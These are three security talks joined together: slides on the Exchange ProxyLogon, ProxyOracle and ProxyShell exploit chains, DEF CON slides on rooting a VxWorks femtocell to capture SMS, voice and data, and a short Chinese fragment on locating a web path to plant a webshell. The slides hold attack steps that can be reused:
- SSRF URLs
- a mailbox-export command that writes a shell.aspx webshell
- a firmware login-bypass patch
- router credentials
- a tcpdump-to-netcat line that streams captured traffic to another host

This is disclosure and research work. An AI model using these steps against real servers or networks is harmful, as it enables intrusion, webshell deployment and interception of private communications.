• 2018 - 1st place of Top 10 Web Hacking Techniques
• 2019 - Winner of Pwnie Awards "Best Server-Side Bug"
• 2021 - Champion and "Master of Pwn" of Pwn2Own
Disclaimer
All vulnerabilities disclosed today are reported responsibly and
patched by Microsoft
Why Target Exchange Server?
1.
Mail servers always keep confidential secrets and Exchange Server is
the most well-known mail solution for enterprises and governments
worldwide
2. Has been the target for Nation-sponsored hackers for a long time
(Equation Group😉)
3. More than 400,000 Exchange servers exposed on the Internet
according to our survey
Exchange Security in the Past Years
• Most bugs are based on known attack vectors but there are still
several notable bugs:
1.
EnglishmansDentist from Equation Group:
• Recap: A only practical and public pre-auth RCE in the Exchange history. Unfortunately, the
arsenal only works on an ancient Exchange Server 2003
2.
CVE-2020-0688 Hardcoded MachineKey from anonymous working with ZDI:
• Recap: A classic .NET deserialization bug due to a hardcoded cryptography key. This is also a
hint shows Microsoft Exchange is lacking of security reviews
Our Works
• We focus on the Exchange architecture and discover a new attack surface
that no one proposed before. That's why we can pop 0days easily!
• We discovered 8 vulnerabilities that covered server-side, client-side, and
crypto bugs through this new attack surface, and chained into 3 attacks:
1.
ProxyLogon: The most well-known pre-auth RCE chain
2.
ProxyOracle: A plaintext-password recovery attacking chain
3.
ProxyShell: The pre-auth RCE chain we demonstrated at Pwn2Own 2021
Vulnerabilities We Discovered
■ Vulnerability related to this new attack surface
Report Time
Name
CVE
Patch Time
Reported by
Jan 05, 2021
ProxyLogon
CVE-2021-26855
Mar 02, 2021
Orange Tsai, Volexity
and MSTIC
Jan 05, 2021
ProxyLogon
CVE-2021-27065
Mar 02, 2021
Orange Tsai, Volexity
and MSTIC
Jan 17, 2021
ProxyOracle
CVE-2021-31196
Jul 13, 2021
Orange Tsai
Jan 17, 2021
ProxyOracle
CVE-2021-31195
May 11, 2021
Orange Tsai
Apr 02, 2021
ProxyShell
(Pwn2Own Bug)
CVE-2021-34473
Apr 13, 2021
Orange Tsai
(Working with ZDI)
Apr 02, 2021
ProxyShell
(Pwn2Own Bug)
CVE-2021-34523
Apr 13, 2021
Orange Tsai
(Working with ZDI)
Apr 02, 2021
ProxyShell
(Pwn2Own Bug)
CVE-2021-31207
May 11, 2021
Orange Tsai
(Working with ZDI)
Jun 02, 2021
-
-
-
Orange Tsai
Vulnerabilities Related to This
Attack Surface
Dubbed to
CVE
Patch Time
Reported by
HAFNIUM
CVE-2021-26855
Mar 02, 2021
Orange Tsai, Volexity and MSTIC
HAFNIUM
CVE-2021-27065
Mar 02, 2021
Orange Tsai, Volexity and MSTIC
HAFNIUM
CVE-2021-26857
Mar 02, 2021
Dubex and MSTIC
HAFNIUM
CVE-2021-26858
Mar 02, 2021
MSTIC
-
CVE-2021-28480
Apr 13, 2021
NSA
-
CVE-2021-28481
Apr 13, 2021
NSA
-
CVE-2021-28482
Apr 13, 2021
NSA
-
CVE-2021-28483
Apr 13, 2021
NSA
■ Vulnerability related to this new attack surface
Exchange Architecture
Backend Server
Frontend Server
2000/2003
Mailbox Role
Client Access Role
Hub Transport
Role
Unified Messaging
Role
Edge Transport
Role
2007/2010
Mailbox Role
Client Access Role
Edge Transport
Role
2013
Edge Transport
Role
2016/2019
Mailbox Role
Mailbox Service
Client Access
Service
Where to Focus?
• We focus on the Client Access Service (CAS)
• CAS is a fundamental protocol handler in Microsoft Exchange Server.
The Microsoft official documentation also indicates:
"Mailbox servers contain the Client Access Services that accept client
connections for all protocols. These frontend services are responsible for
routing or proxying connections to the corresponding backend services"
where we focus on
Client Access Service in IIS
Two websites?
Client Access Service in IIS
Exchange Architecture
• Applications in Frontend include the ProxyModule
• Parse incoming HTTP requests, apply protocol specified settings, and
forward to the Backend
• Applications in Backend include the BackendRehydrationModule
• Receive and populate HTTP requests from the Frontend
• Applications synchronizes the internal information between the
Frontend and Backend by HTTP headers
IIS
IIS
Remote
PowerShell
RPC
Proxy
EWS, OWA
ECP, OAB…
Mailbox Database
FrontEnd Service
BackEnd Service
HTTP/HTTPS
IIS Modules
Validation
Module
Logging
Module
IIS Modules
Filter
Module
FBA
Module
Oauth
Module
…
Rehydration
Module
RoutingUpdate
Module
RBAC
Module
HTTP Proxy Module
Our Ideas
Could we access the Backend intentionally?
\ProxyRequestHandler.cs
BeginRequest
AuthenticateRequest
AuthorizeRequest
MapRequestHandler
EndRequest
IHttpHandler
LogRequest
1.
Request Section
> CopyHeadersToServerRequest
> CopyCookiesToServerRequest
> AddProtocolSpecificHeadersToServerRequest
2.
Proxy Section
> GetTargetBackEndServerUrl
> CreateServerRequest
> GetServerResponse
3.
Response Section
> CopyHeadersToClientResponse
> CopyCookiesToClientResponse
Copy Client Headers
1.
Request Section
> CopyHeadersToServerRequest
> CopyCookiesToServerRequest
> AddProtocolSpecificHeadersToServerRequest
2.
Proxy Section
> GetTargetBackEndServerUrl
> CreateServerRequest
> GetServerResponse
3.
Response Section
> CopyHeadersToClientResponse
> CopyCookiesToClientResponse
BeginRequest
AuthenticateRequest
AuthorizeRequest
MapRequestHandler
EndRequest
IHttpHandler
LogRequest
HTTP Header Blacklists
protected virtual bool ShouldCopyHeaderToServerRequest(string headerName) {
return !string.Equals(headerName, "X-CommonAccessToken", OrdinalIgnoreCase)
&& !string.Equals(headerName, "X-IsFromCafe", OrdinalIgnoreCase)
&& !string.Equals(headerName, "X-SourceCafeServer", OrdinalIgnoreCase)
&& !string.Equals(headerName, "msExchProxyUri", OrdinalIgnoreCase)
&& !string.Equals(headerName, "X-MSExchangeActivityCtx", OrdinalIgnoreCase)
&& !string.Equals(headerName, "return-client-request-id", OrdinalIgnoreCase)
&& !string.Equals(headerName, "X-Forwarded-For", OrdinalIgnoreCase)
&& (!headerName.StartsWith("X-Backend-Diag-", OrdinalIgnoreCase)
|| this.ClientRequest.GetHttpRequestBase().IsProbeRequest());
}
HttpProxy\ProxyRequestHandler.cs
Copy Client Cookies
1.
Request Section
> CopyHeadersToServerRequest
> CopyCookiesToServerRequest
> AddProtocolSpecificHeadersToServerRequest
2.
Proxy Section
> GetTargetBackEndServerUrl
> CreateServerRequest
> GetServerResponse
3.
Response Section
> CopyHeadersToClientResponse
> CopyCookiesToClientResponse
BeginRequest
AuthenticateRequest
AuthorizeRequest
MapRequestHandler
EndRequest
IHttpHandler
LogRequest
Add Special Headers
1.
Request Section
> CopyHeadersToServerRequest
> CopyCookiesToServerRequest
> AddProtocolSpecificHeadersToServerRequest
2.
Proxy Section
> GetTargetBackEndServerUrl
> CreateServerRequest
> GetServerResponse
3.
Response Section
> CopyHeadersToClientResponse
> CopyCookiesToClientResponse
BeginRequest
AuthenticateRequest
AuthorizeRequest
MapRequestHandler
EndRequest
IHttpHandler
LogRequest
Clone User Identity
if (this.ClientRequest.IsAuthenticated) {
CommonAccessToken commonAccessToken = AspNetHelper.FixupCommonAccessToken(
this.HttpContext, this.AnchoredRoutingTarget.BackEndServer.Version);
if (commonAccessToken != null) {
headers["X-CommonAccessToken"] = commonAccessToken.Serialize(
new int?(HttpProxySettings.CompressTokenMinimumSize.Value));
}
} else if (this.ShouldBackendRequestBeAnonymous()) {
headers["X-CommonAccessToken"] = new CommonAccessToken(9).Serialize();
}
HttpProxy\ProxyRequestHandler.cs
Calculate Backend URL
1.
Request Section
> CopyHeadersToServerRequest
> CopyCookiesToServerRequest
> AddProtocolSpecificHeadersToServerRequest
2.
Proxy Section
> GetTargetBackEndServerUrl
> CreateServerRequest
> GetServerResponse
3.
Response Section
> CopyHeadersToClientResponse
> CopyCookiesToClientResponse
BeginRequest
AuthenticateRequest
AuthorizeRequest
MapRequestHandler
EndRequest
IHttpHandler
LogRequest
Create New HTTP Client
1.
Request Section
> CopyHeadersToServerRequest
> CopyCookiesToServerRequest
> AddProtocolSpecificHeadersToServerRequest
2.
Proxy Section
> GetTargetBackEndServerUrl
> CreateServerRequest
> GetServerResponse
3.
Response Section
> CopyHeadersToClientResponse
> CopyCookiesToClientResponse
BeginRequest
AuthenticateRequest
AuthorizeRequest
MapRequestHandler
EndRequest
IHttpHandler
LogRequest
Attach Authorization Header
if (this.ProxyKerberosAuthentication) {
// use origin Kerberos Authentication
} else if (this.AuthBehavior.AuthState == AuthState.BackEndFullAuth || this.
ShouldBackendRequestBeAnonymous() || (HttpProxySettings.TestBackEndSupportEnabled.Value
&& !string.IsNullOrEmpty(this.ClientRequest.Headers["TestBackEndUrl"]))) {
// unauthenticated
} else {
serverRequest.Headers["Authorization"] = KerberosUtilities.GenerateKerberosAuthHeader(
serverRequest.Address.Host, this.TraceContext,
ref this.authenticationContext, ref this.kerberosChallenge);
}
HttpProxy\ProxyRequestHandler.cs
Generate Kerberos Ticket
internal static string GenerateKerberosAuthHeader(string host, int traceContext, ref
AuthenticationContext authenticationContext, ref string kerberosChallenge) {
// …
authenticationContext = new AuthenticationContext();
authenticationContext.InitializeForOutboundNegotiate(AuthenticationMechanism.Kerberos,
"HTTP/" + host, null, null);
SecurityStatus securityStatus = authenticationContext.NegotiateSecurityContext(inputBuffer,
out bytes);
return "Negotiate " + Encoding.ASCII.GetString(bytes);
}
HttpProxy\KerberosUtilities.cs
The Actual Request Sent to
Backend
Get Backend Response
1.
Request Section
> CopyHeadersToServerRequest
> CopyCookiesToServerRequest
> AddProtocolSpecificHeadersToServerRequest
2.
Proxy Section
> GetTargetBackEndServerUrl
> CreateServerRequest
> GetServerResponse
3.
Response Section
> CopyHeadersToClientResponse
> CopyCookiesToClientResponse
BeginRequest
AuthenticateRequest
AuthorizeRequest
MapRequestHandler
EndRequest
IHttpHandler
LogRequest
Copy Response to Client
1.
Request Section
> CopyHeadersToServerRequest
> CopyCookiesToServerRequest
> AddProtocolSpecificHeadersToServerRequest
2.
Proxy Section
> GetTargetBackEndServerUrl
> CreateServerRequest
> GetServerResponse
3.
Response Section
> CopyHeadersToClientResponse
> CopyCookiesToClientResponse
BeginRequest
AuthenticateRequest
AuthorizeRequest
MapRequestHandler
EndRequest
IHttpHandler
LogRequest
Backend Rehydration Module
• IIS has implicitly done the Authentication and set
the User.Identity to current HttpContext object
private void OnAuthenticateRequest(object source,
EventArgs args) {
if (httpContext.Request.IsAuthenticated) {
this.ProcessRequest(httpContext);
}
}
private void ProcessRequest(HttpContext httpContext) {
CommonAccessToken token;
if (this.TryGetCommonAccessToken(httpContext, out token))
// …
}
\BackendRehydrationModule.cs
BeginRequest
AuthenticateRequest
AuthorizeRequest
MapRequestHandler
EndRequest
IHttpHandler
LogRequest
1
Restore Frontend User Identity
2
private bool TryGetCommonAccessToken(HttpContext httpContext, out
CommonAccessToken token) {
string text = httpContext.Request.Headers["X-CommonAccessToken"];
flag = this.IsTokenSerializationAllowed(httpContext.User.Identity
as WindowsIdentity);
if (!flag)
throw new BackendRehydrationException(…)
token = CommonAccessToken.Deserialize(text);
httpContext.Items["Item-CommonAccessToken"] = token;
Security\Authentication\BackendRehydrationModule.cs
1
Is Token Serialization Allowed?
2
private bool TryGetCommonAccessToken(HttpContext httpContext, out
CommonAccessToken token) {
string text = httpContext.Request.Headers["X-CommonAccessToken"];
flag = this.IsTokenSerializationAllowed(httpContext.User.Identity
as WindowsIdentity);
if (!flag)
throw new BackendRehydrationException(…)
token = CommonAccessToken.Deserialize(text);
httpContext.Items["Item-CommonAccessToken"] = token;
Security\Authentication\BackendRehydrationModule.cs
Check AD Extended Rights
private bool IsTokenSerializationAllowed(WindowsIdentity windowsIdentity) {
flag2 = LocalServer.AllowsTokenSerializationBy(clientSecurityContext);
return flag2;
}
private static bool AllowsTokenSerializationBy(ClientSecurityContext clientContext) {
return LocalServer.HasExtendedRightOnServer(clientContext,
WellKnownGuid.TokenSerializationRightGuid); // ms-Exch-EPI-Token-Serialization
}
Security\Authentication\BackendRehydrationModule.cs
Auth-Flow in Summary
1.
Frontend IIS authenticates the request (Windows or Basic authentication) and serializes the
current Identity to X-CommonAccessToken HTTP header
2.
Frontend generates a Kerberos ticket by its HTTP SPN to Authorization HTTP header
3.
Frontend proxies the HTTP request to Backend
4.
Backend IIS authenticates the request and check the authenticated user has TokenSerialization right
5.
Backend rehydrates the user from X-CommonAccessToken HTTP header
HTTP/HTTPS
CAS Backend
Module
F
Rehydration
Module
Module
D
Module
E
CAS Frontend
HttpProxy
Module
Module A
Module B
Module C
HTTP/HTTPS
Let's Hack the Planet
ProxyLogon
• The most well-known Exchange Server vulnerability in the world😩
• An unauthenticated attacker can execute arbitrary codes on Microsoft Exchange
Server through an only exposed 443 port!
• ProxyLogon is chained with 2 bugs:
• CVE-2021-26855 - Pre-auth SSRF leads to Authentication Bypass
• CVE-2021-27065 - Post-auth Arbitrary-File-Write leads to RCE
Where ProxyLogon Begin?
1.
Request Section
> CopyHeadersToServerRequest
> CopyCookiesToServerRequest
> AddProtocolSpecificHeadersToServerRequest
2.
Proxy Section
> GetTargetBackEndServerUrl
> CreateServerRequest
> GetServerResponse
3.
Response Section
> CopyHeadersToClientResponse
> CopyCookiesToClientResponse
BeginRequest
AuthenticateRequest
AuthorizeRequest
MapRequestHandler
EndRequest
IHttpHandler
LogRequest
Arbitrary Backend Assignment
1
2
protected override AnchorMailbox ResolveAnchorMailbox() {
HttpCookie httpCookie = base.ClientRequest.Cookies["X-AnonResource-Backend"];
if (httpCookie != null) {
this.savedBackendServer = httpCookie.Value;
}
return new ServerInfoAnchorMailbox(
BackEndServer.FromString(this.savedBackendServer), this);
}
HttpProxy\OwaResourceProxyRequestHandler.cs
https://[foo]@example.com:443/path#]:444/owa/auth/x.js
Super SSRF
• What's the root cause about this arbitrary backend assignment?
• The Exchange has to adapt the compatibility between new and old architectures,
hence Exchange introduces the cookie
• A Super SSRF
• Control almost all the HTTP request and get all the response
• Attach with a Kerberos Ticket with Exchange$ account privilege automatically
• Leverage the backend internal API /ecp/proxylogon.ecp to obtain a valid Control
Panel session and a file-write bug to get RCE
Demo
https://youtu.be/SvjGMo9aMwE
ProxyOracle
• An interesting Exchange Server exploit with different approach
• An unauthenticated attacker can recover the victim's username and password
in plaintext format simply by pushing the user open the malicious link
• ProxyOracle is chained with 2 bugs:
• CVE-2021-31195 - Reflected Cross-Site Scripting
• CVE-2021-31196 - Padding Oracle Attack on Exchange Cookies Parsing
How Users Log-in OWA/ECP?
Form-Based Authentication
IIS
IIS
Remote
PowerShell
RPC
Proxy
EWS/OWA
ECP/OAB…
Mailbox Database
HTTP/HTTPS
IIS Modules
Validation
Logging
IIS Modules
Filter
FBA
Oauth
…
Rehydration
Routing
Update
RBAC
HTTP Proxy Module
How FBA Cookies Looks Like
cadataTTL
cadataKey
cadata
cadataIV
cadataSig
FbaModule Encryption Logic
@key = GetServerSSLCert().GetPrivateKey()
cadataSig = RSA(@key).Encrypt("Fba Rocks!")
cadataIV
= RSA(@key).Encrypt(GetRandomBytes(16))
cadataKey = RSA(@key).Encrypt(GetRandomBytes(16))
@timestamp = GetCurrentTimestamp()
cadataTTL
= AES_CBC(cadataKey, cadataIV).Encrypt(@timestamp)
@blob = "Basic " + ToBase64String(UserName + ":" + Password)
cadata = AES_CBC(cadataKey, cadataIV).Encrypt(@blob)
PSEUDO CODE
FbaModule Encryption Logic
private void ParseCadataCookies(HttpApplication httpApplication) {
using (ICryptoTransform transform = aesCryptoServiceProvider.CreateDecryptor()) {
try {
byte[] array5 = Convert.FromBase64String(request.Cookies["cadata"].Value);
bytes2 = transform.TransformFinalBlock(array5, 0, array5.Length);
} catch (CryptographicException arg8) {
return;
}
}
}
HttpProxy\FbaModule.cs
The Oracle
protected enum LogonReason {
None,
Logoff,
InvalidCredentials,
Timeout,
ChangePasswordLogoff
}
\FbaModule.cs
Padding
Error
Padding
Good
Login
Failure
Login
Success
AES
Decrypt
/logon.aspx
?reason=2
Continue
Login
/logon.aspx
?reason=0
We can decrypt the cookies now
But… How to get the client cookies?
We discover a new XSS to chain together
However, all sensitive cookies are protected by HttpOnly😥
Visit page /foo.gif
Send response
Proxy page /foo.gif
Send response
Send malicious mail to victim
Trigger the XSS
Set SSRF cookie
Take Over Client Requests
Victim
Exchange
Attacker
Open malicious mail
Redirect to XSS page
1
2
3
4
Demo
https://youtu.be/VuJvmJZxogc
ProxyShell
• The exploit chain we demonstrated at Pwn2Own 2021
• An unauthenticated attacker can execute arbitrary commands on Microsoft
Exchange Server through an only exposed 443 port!
• ProxyShell is chained with 3 bugs:
• CVE-2021-34473 - Pre-auth Path Confusion leads to ACL Bypass
• CVE-2021-34523 - Elevation of Privilege on Exchange PowerShell Backend
• CVE-2021-31207
- Post-auth Arbitrary-File-Write leads to RCE
Where ProxyShell Begin?
1.
Request Section
> CopyHeadersToServerRequest
> CopyCookiesToServerRequest
> AddProtocolSpecificHeadersToServerRequest
2.
Proxy Section
> GetTargetBackEndServerUrl
> CreateServerRequest
> GetServerResponse
3.
Response Section
> CopyHeadersToClientResponse
> CopyCookiesToClientResponse
BeginRequest
AuthenticateRequest
AuthorizeRequest
MapRequestHandler
EndRequest
IHttpHandler
LogRequest
ProxyShell
• ProxyShell started with a Path Confusion bug on Exchange Server
Explicit Logon feature
• The feature is designed to enable users to open another mailbox/calendar and
display it in a new browser window
• The Exchange parsed the mailbox address and normalized the URL internally
https://exchange/OWA/[email protected]/Default.aspx
2
Extract Mailbox Address from URL
1
protected override AnchorMailbox ResolveAnchorMailbox() {
if (RequestPathParser.IsAutodiscoverV2PreviewRequest(base.ClientRequest.Url.AbsolutePath))
text = base.ClientRequest.Params["Email"];
// …
this.isExplicitLogonRequest = true;
this.explicitLogonAddress = text;
}
public static bool IsAutodiscoverV2PreviewRequest(string path) {
return path.EndsWith("/autodiscover.json", StringComparison.OrdinalIgnoreCase);
}
HttpProxy\EwsAutodiscoverProxyRequestHandler.cs
The Fatal Erase
protected override UriBuilder GetClientUrlForProxy() {
string absoluteUri = base.ClientRequest.Url.AbsoluteUri;
uri = UrlHelper.RemoveExplicitLogonFromUrlAbsoluteUri(absoluteUri,
this.explicitLogonAddress);
return new UriBuilder(uri);
}
public static string RemoveExplicitLogonFromUrlAbsoluteUri(string absoluteUri, string
explicitLogonAddress) {
string text = "/" + explicitLogonAddress;
if (absoluteUri.IndexOf(text) != -1)
return absoluteUri.Substring(0, num) + absoluteUri.Substring(num + text.Length);
}
HttpProxy\EwsAutodiscoverProxyRequestHandler.cs
1
2
The actual part to be removed
Explicit Logon pattern
https://exchange/autodiscover/[email protected]/?&
Email=autodiscover/autodiscover.json%[email protected]
The actual part to be removed
Explicit Logon pattern
https://exchange/autodiscover/[email protected]/?&
Email=autodiscover/autodiscover.json%[email protected]
https://exchange:444/?&
Email=autodiscover/autodiscover.json%[email protected]
Arbitrary Backend Access Again!
Exchange PowerShell Remoting
• The Exchange PowerShell Remoting is a command-line interface that
enables the automation of Exchange tasks
• The Exchange PowerShell Remoting is built upon PowerShell API and uses the
Runspace for isolations. All operations are based on WinRM protocol
• Interact with the PowerShell Backend fails because there is no mailbox for the
SYSTEM user
• We found a piece of code extract Access-Token from URL
Extract Access Token from URL
2
1
private void OnAuthenticateRequest(object source, EventArgs args) {
HttpContext httpContext = HttpContext.Current;
if (httpContext.Request.IsAuthenticated) {
if (string.IsNullOrEmpty(httpContext.Request.Headers["X-CommonAccessToken"])) {
Uri url = httpContext.Request.Url;
Exception ex = null;
CommonAccessToken commonAccessToken = CommonAccessTokenFromUrl(httpContext.
User.Identity.ToString(), url, out ex);
}
}
}
\Configuration\RemotePowershellBackendCmdletProxyModule.cs
Extract Access Token from URL
private CommonAccessToken CommonAccessTokenFromUrl(string user, Uri requestURI,
out Exception ex) {
CommonAccessToken result = null;
string text = LiveIdBasicAuthModule.GetNameValueCollectionFromUri(
requestURI).Get("X-Rps-CAT");
result = CommonAccessToken.Deserialize(Uri.UnescapeDataString(text));
return result;
}
\RemotePowershellBackendCmdletProxyModule.cs
Privilege Downgrade
• An Elevation of Privilege (EOP) because we can access Exchange
PowerShell Backend directly
• The intention of this operation is to be a quick proxy for Internal Exchange
PowerShell communications
• Specify the Access-Token in X-Rps-CAT to Impersonate to any user
• We use this Privilege Escalation to "downgrade" ourself from SYSTEM to Exchange
Admin
Execute Arbitrary Exchange PowerShell as Admin
And then?
Attack Exchange PowerShell
• The last piece of the puzzle is to find a post-auth RCE to chain together
• Since we are Exchange admin now, It's easy to abuse the Exchange PowerShell
command New-MailboxExportRequest to export user's mailbox into an UNC path
New-MailboxExportRequest –Mailbox [email protected]
–FilePath \\127.0.0.1\C$\path\to\shell.aspx
Payload Delivery
• How to embed the malicious payload into the exported file?
• We deliver the malicious payloads by Emails (SMTP) but the file is encoded😢
• The exported file is in Outlook Personal Folders (PST) format, by reading the MS-
PST documentation, we learned it's just a simple permutation encoding
mpbbCrypt = [65, 54, 19, 98, 168, 33, 110, 187, 244, 22, 204, 4, 127, 100, 232, …]
encode_table = bytes.maketrans((bytearray(mpbbCrypt), bytearray(range(256)))
'<%@ Page Language="Jscript"%>…'.translate(encode_table)
\RemotePowershellBackendCmdletProxyModule.cs
Put it All Together
1.
Deliver our encoded WebShell payload by SMTP
2. Launch the native PowerShell and intercept the WinRM protocol
• Rewrite the /PowerShell/ to /Autodiscover/ to trigger the Path Confusion bug
• Add query string X-Rps-CAT with corresponding Exchange Admin Access Token
3. Execute commands inside the established PowerShell session
• New-ManagementRoleAssignment to grant ourself Mailbox Import Export Role
• New-MailboxExportRequest to write ASPX file into the local UNC path
4. Enjoy the shell
Demo
https://youtu.be/FC6iHw258RI
Mitigations
1.
Keep Exchange Server up-to-date and not externally facing the
Internet (especially web part)
2.
Microsoft has enhanced the CAS Frontend in April 2021
• The enhancement mitigated the authentication part of this attack surface and
reduced the "pre-auth" effectively
3. Move to Office 365 Exchange Online😏(Just kidding)
Conclusion
• Modern problems require modern solutions
• Try to comprehend the architectures from a higher point of view
• The Exchange CAS is still a good attack surface
• Due to the lack of "pre-auth" bugs, the result may not be as powerful as before
• Exchange is still a buried treasure and waiting for you to hunt bugs
• Fun fact - even you found a super critical bug like ProxyLogon, Microsoft will not
reward you any bounty because Exchange Server On-Prem is out of scope
orange_8361
[email protected]
Thanks!
https://blog.orange.tw | pdf |
Build a free cellular traffic capture tool
with a vxworks based femoto
Hacking Femtocell
Hacking Femtocell
1
Yuwei Zheng @DEF CON 23
Haoqi Shan @DEF CON 23
From: 360 Unicorn Team
Main contents
Hacking Femtocell
• About us
• Why do we need it
• How to get a free Femtocell
• Deeply Hack
• Capture packets
• Summary and Reference
2
About us
Hack Femtocell
• 360 Unicorn Team
• Radio & Hardware Security Research
• Consists of a group of brilliant security researchers
• Focus on the security of anything that uses radio
technologies
• RFID, NFC, WSN
• GPS, UAV, Smart Cars, Telecom, SATCOM
• Our primary mission
• Guarantee that Qihoo360 is not vulnerable to any wireless attack
• Qihoo360 protects its users and we protect Qihoo360
• One of the Defcon 23 vendors
• https://www.defcon.org/html/defcon-23/dc-23-vendors.html
3
About me
Hacking Femtocell
• Yuwei Zheng
• a senior security researcher concentrated in embedded systems
• reversed blackberry BBM, PIN, BIS push mail protocol
• decrypted the RIM network stream successfully in 2011
• finished a MITM attack for blackberry BES
• Haoqi Shan
• a wireless/radio security researcher in Unicorn Team
• obtained bachelor degree of electronic engineering in 2015
• focuses on Wi-Fi penetration, GSM system, router/switcher
hacking
4
Why do we need it
Hacking Femtocell
• Research on products integrated cellular modem
• Capture and hijack
• SMS
• Voice
• Data traffic
5
Why not software-based GSM base station
Hacking Femtocell
• OpenBTS
• USRP
• GNU Radio
• Why not?
• Data traffic hijack
• Access denied to operator core network
• NO real uplink & downlink SMS hijack
6
Femtocell’s advantages
Hacking Femtocell
• Access to network operator
• What a hacked Femtocell can do
• SMS and Data traffic
• Capture
• Hijack
• Modify
• Even more…
• Roaming in operator’s network
7
Use Femtocell in research
Hacking Femtocell
• Cellular modem integrated devices
• Capture or modify control order
• SMS
• 2G
• Capture or modify circle data
• SMS
• 2G
• Trusted data link?
• Find your system vulnerability
8
How to get a free Femtocell
Hacking Femtocell
• Can’t be bought?
• Social engineering
• Complains to Customer Service
• Bad network signal
• Again and again
• Make a complaint to management
• Finally
“Sir, we will set up a femtocell in your home, I hope
this device can make your network signal better. ”
9
Let’s hack it
Hacking Femtocell
• Inside the femtocell
• Home NodeB
• Router with Wi-Fi
• 1 Wan port
• 2 Lan port
• Router configuration page IP
• 192.168.197.1
• Home NodeB configuration page IP
• 192.168.197.241
10
Quick and simple port scan
Hacking Femtocell
• nmap –sT –sU 192.168.197.241
11
Try to log in
Hacking Femtocell
• Try telnet/ftp/http/tftp
12
• Seems like VxWorks OS
• Error password again and again?
• Longer and longer time between prompt shows up
• Forget about brute force
Err… it’s VxWorks…
Hacking Femtocell
• VxWorks
• a real-time operating system developed as proprietary software
• designed for use in embedded systems requiring real-time
• safety and security certification
• for industries, such as aerospace and defense
• medical devices, industrial equipment
• Notable uses
• The Mars Reconnaissance Orbiter
• Northrop Grumman X-47B Unmanned Combat Air System
• Apple Airport Extreme
• Proprietary software
• Well, seems much harder to be hacked than Linux-based
Femtocell
13
wdbprc(dump memory)
Hacking Femtocell
• VxWorks system debug interface
• Exploit in metasploit by H.D.Moore
• Failed in use
14
wdbprc(scan version)
Hacking Femtocell
• Scanner in metasploit by H.D.Moore
• Repaired
15
Dismantling the hardware
Hacking Femtocell
• Home NodeB
• OMAPL138E
• DSP
• ARM9
• FPGA
• Router
• AR9341
• Router
• Wi-Fi AP
16
Find the UART interface
Hacking Femtocell
• Hmmm… easy!
17
Use the gift
Hacking Femtocell
• Interrupt the boot process
• Get more useful information
18
Play with bootshell
Hacking Femtocell
19
Bootparm
Hacking Femtocell
• Use `p’ show bootparm
20
What’s inside
Hacking Femtocell
21
What’s inside
Hacking Femtocell
• tffs0
• Directory Structure
• common
• configuration file
• user1
• running version VxWorks system and apps
• user2
• last version VxWorks system and apps
• wlanBackup
• router firmware backup files
22
Download the firmware
Hacking Femtocell
• use tftp port
• Where is it?
• `cp’
• `tftp get’
• One by one
23
Analyze the firmware
Hacking Femtocell
• use `cp’ command
• cp /tffs0/user1/mpcs.Z host:/ftpforvx/user1/mpcs.Z
• cp /tffs0/blabla host:/blabla
• load kernel by command `l’
24
• mpcs.Z base address 0xc010000
Deflate the kernel image
Hacking Femtocell
• mpcs.Z
• 《Understanding the bootrom image》
• vxWorks compressed by deflate?
• WindRiver deflate header
• Head magic 05 15 01 00, 4 bytes
• Length , 4 bytes
• Flag 08, 1bytes
• Skip the first 9 bytes, zlib-flate it!
25
Deflate the kernel image
Hacking Femtocell
• dd if=./mpcs.Z of=./mpcs.deflate ibs=1 obs=1 skip=9
• zlib-flate -uncompress < mpcs.deflate > mpcs.out
• strings mpcs.out | grep –i “copyright”
• Success!
26
Recovery login password
Hacking Femtocell
• Login init process
• user name
• password hash
27
Recovery login password
Hacking Femtocell
• Decrypt password hash
• 73l8gRjwLftklgfdXT+MdiMEjJwGPVMsyVxe16iYpk8=
• Base64 encode?
• EF797C8118F02DFB649607DD5D3F8C7623048C9C063D532
CC95C5ED7A898A64F
• I’m feeling lucky
• http://www.hashkiller.co.uk/
• SHA256
• 12345678
•
• Always try 88888888 12345678 first!
28
Patch it
Hacking Femtocell
• Not weak password?
• Find the authenticate function
29
Patch it
Hacking Femtocell
• Bypass login process
• patch the firmware
• zlib compress it
• add vxWorks header number
• download file by ftp
• Hot patch
• Boot shell
• `l’ command unzip and load mpcs.Z
• `m’ command patch
• 0xc0574d64
• DF FF FF 0A -> DF FF FF EA
• BEQ loc_C0574CE8 -> B loc_C0574CE8
30
vxWorks kernel shell
Hacking Femtocell
• Log in then debug the kernel
• Lots of tools
• Debug it!
• `func’
• Modify it!
• `mem’
31
Capture data packets
Hacking Femtocell
• Forward
• telnet router
• root:5up
• tcpdump -n -i br0 -s 0 -w - host not 192.168.197.104 | netcat
192.168.197.104 9527 &
• nc -l -v -p 9527 >> sms.pcap
• Listen
• mirror router port
• wireshark
• real-time
32
Capture data packets
Hacking Femtocell
33
Encrypted?
Hacking Femtocell
• Read log file, IPSec?
• Find the enc key and auth key
34
Fix protocol port
Hacking Femtocell
• IPSec
• 500 -> 60295 ISAKMP
• 4500 -> 60296 UDPENCAP
35
Now decrypt it
Hacking Femtocell
• Edit ESP SAs
• Add uplink and downlink SA separately
36
Wrong protocol
Hacking Femtocell
• Iu-h protocol?
37
Find the answer
Hacking Femtocell
• Reverse GSM board firmware
38
Rebuild Wireshark
Hacking Femtocell
• Write our own dissector?
• Complicated…
• ASN1
• RUA
• RANAP
• Blablabla…
• Analyze packets byte by byte
• Fix the wireshark dissector rules
• Rebuild it!
• Voilà
39
Capture SMS
Hacking Femtocell
40
Capture voice
Hacking Femtocell
41
Capture GPRS data
Hacking Femtocell
42
Capture GPRS data
Hacking Femtocell
43
Capture your email
Hacking Femtocell
44
Summary and References
Hacking Femtocell
• Summary
• VxWorks is not easy to hack
• More mining, more fun
• Wanna know more? Feel free to contact us
• References
•
TRAFFIC INTERCEPTION AND REMOTE MOBILE PHONE CLONING WITH A
COMPROMISED CDMA FEMTOCELL -
https://www.nccgroup.trust/globalassets/newsroom/us/blog/docu
ments/2013/femtocell.pdf
• VxWorks Command-Line Tools User's Guide -
http://88.198.249.35/d/VxWorks-Application-Programmer-s-
Guide-6-6.pdf
• VxWorks Application Programmer's Guide, 6.6 –
http://read.pudn.com/downloads149/ebook/646091/vxworks_app
lication_programmers_guide_6.6.pdf
45 | pdf |
Windows命令执⾏获取web路径
在某些情况下,存在Windows命令执⾏,但是不出⽹,也没有回显。
但是需要获取⼀个web绝对路径,可以通过这个路径配合其他漏洞拿webshell,也
可以把命令执⾏结果写⼊到web路径下进⾏访问(相当于回显)。
在Win中可以通过以下⽅法获得:
想直接看结论的跳转到 总结 即可。
⼀些坑
这⾥借鉴了520师傅的命令
https://sec.lz520520.com/2021/01/596/
